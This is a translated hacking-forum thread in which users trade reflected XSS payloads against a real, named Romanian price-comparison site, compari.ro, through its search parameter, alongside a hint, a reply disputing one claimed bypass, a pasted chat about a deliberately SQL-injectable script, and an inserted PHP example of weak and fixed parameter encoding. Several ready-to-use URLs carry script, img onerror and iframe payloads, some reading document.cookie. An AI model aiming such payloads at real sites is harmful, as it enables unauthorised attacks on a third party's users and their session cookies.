Goke

HARD XSS CHALLENGE


Posted (edited)

http://www.compari.ro/CategorySearch.php?st=

The vector has to come right after ?st=

like

http://www.compari.ro/CategorySearch.php?st=<script>alert(1)</script>

and not

http://www.compari.ro/CategorySearch.php?st=graficard&noredirect=&minprice=%22%3E%3Cimg+src%3Dx+onerror%3Dconfirm%281%29%3E&maxprice=%22%3E%3Cimg+src%3Dx+onerror%3Dconfirm%281%29%3E&orderby=9

Done by someone... (not naming names)

http://i.imgur.com/stLQEdk.png

I DIDN'T WANT TO GIVE A HINT... BECAUSE THEN EVERYONE WOULD CATCH ON... I THINK I'LL REGRET IT, BUT ANYWAY :))

HINT=" + "

Edited by Goke
  • Downvote 1
Posted

I'm sorry you deleted the old topic, the one where you failed and said the parameter was st, but you had actually done the XSS on the price comparison field.

How did I figure it out?

1. If you put any vector in the search, nothing shows up, no results at all, whereas you got results that had nothing to do with it.

2. You had censored the price comparison field.

3. You had the same print screen as mine (that is, it was in the same place).

Posted
  Goke said:

//Knowing that bypassing htmlentities is an impossible thing, look, here it isn't impossible ^_^//

Bypassing htmlentities can be done in some ideal cases. In your case the vector that executed is not the one displayed through htmlentities; you didn't do any bypass, relax.
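
The situation the replies describe, as an added example that is not part of the thread and is not compari.ro's code: one reflected parameter is encoded while another is echoed raw into an attribute. The parameter names `st` and `minprice` and the test string come from the URLs in the first post; the markup and all function names are assumptions.

```php
<?php
// Hypothetical handler, not compari.ro's code. Parameter names come from
// the URLs in the thread; the markup and function names are assumed.

// Return a query parameter as a string; arrays (?st[]=x) become ''.
function param(array $q, string $name): string {
    $v = $q[$name] ?? '';
    return is_string($v) ? $v : '';
}

// Encode a value for use inside a quoted HTML attribute.
function attr(string $v): string {
    return htmlspecialchars($v, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Before: st goes through htmlentities, minprice is echoed raw.
function render_weak(array $q): string {
    $st  = htmlentities(param($q, 'st'), ENT_QUOTES, 'UTF-8');
    $min = param($q, 'minprice');
    return "<input name=\"st\" value=\"$st\">\n"
         . "<input name=\"minprice\" value=\"$min\">\n";
}

// After: minprice must be all digits, and every reflected value is encoded.
function render_fixed(array $q): string {
    $min = param($q, 'minprice');
    if (!ctype_digit($min)) {
        $min = '';
    }
    return '<input name="st" value="' . attr(param($q, 'st')) . "\">\n"
         . '<input name="minprice" value="' . attr($min) . "\">\n";
}

// Constructed request: the test string from the first post's URL (decoded),
// placed in both parameters.
$probe = '"><img src=x onerror=confirm(1)>';
$q = ['st' => $probe, 'minprice' => $probe];

echo "--- weak ---\n", render_weak($q);
echo "--- fixed ---\n", render_fixed($q);
```

In the weak output the `st` field stays inert while the `minprice` field closes its attribute, which is why encoding has to be checked per reflected parameter rather than per page.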

Posted
  Quote

[1:06:14 PM] 01000010 01101000 01100001 01111000 01111000 01101111 01110010: can you help me with a host?

[1:06:18 PM] 01000010 01101000 01100001 01111000 01111000 01101111 01110010: free

[1:06:22 PM] 01000010 01101000 01100001 01111000 01111000 01101111 01110010: because I have one from hostinger

[1:06:24 PM] 01000010 01101000 01100001 01111000 01111000 01101111 01110010: and

[1:06:28 PM] 01000010 01101000 01100001 01111000 01111000 01101111 01110010: I don't like it ,,

[1:06:35 PM] 01000010 01101000 01100001 01111000 01111000 01101111 01110010: it used to work

[1:06:50 PM] 01000010 01101000 01100001 01111000 01111000 01101111 01110010: I made myself a database connection script vulnerable to sqli

[1:06:59 PM] 01000010 01101000 01100001 01111000 01111000 01101111 01110010: but now when I try order by

[1:07:01 PM] 01000010 01101000 01100001 01111000 01111000 01101111 01110010: it doesn't work anymore

[1:07:08 PM] 01000010 01101000 01100001 01111000 01111000 01101111 01110010: and I think it's because of the host

Yeah, something like that on Skype.

  • Downvote 1
Posted

Sorry :D

compari.ro/CategorySearch.php?st=“/><script>alert(1);</script>

compari.ro/CategorySearch.php?st=‘>aaaaa<script>alert(document.cookie)</script>

compari.ro/CategorySearch.php?st=->”<''<iframe src=http://rstforums.com onload=alert(document.cookie)<
